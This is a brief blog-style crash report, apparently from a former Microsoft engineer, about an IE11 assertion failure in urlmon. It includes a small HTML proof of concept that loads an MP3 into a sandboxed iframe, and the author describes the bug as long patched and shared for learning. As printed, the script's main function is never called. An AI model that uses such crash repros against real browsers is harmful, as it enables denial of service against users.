DoS: Loading an MP3 Inside a Sandboxed iFrame

A brief crash report. Loading an MP3 file into a sandboxed iFrame triggered an assertion failure in urlmon!CINetHttp::LastRequestHandleClosed.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_Load_MP3_in_SandBoxed_iFrame</title>
</head>
<body>
<iframe sandbox width="50" height="20"></iframe>
<script>
function main()
{
	window[0].location = "mp3.mp3";
}
</script>
</body>
</html>

The assertion message in urlmon/iapp/cnethttp.cxx at line 4900 indicated that the HTTP request handle was in an unexpected state when the sandboxed context tried to load the audio file. The sandbox restrictions apparently interfered with the protocol handler’s teardown sequence, leaving the network state machine in a condition that violated an internal invariant. Exploitability was unknown.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: designMode + document.open from iFrame Crashes Browser] :: [IE11 Sandbox Too Tight: Pop-up Inherits Sandbox Restrictions] >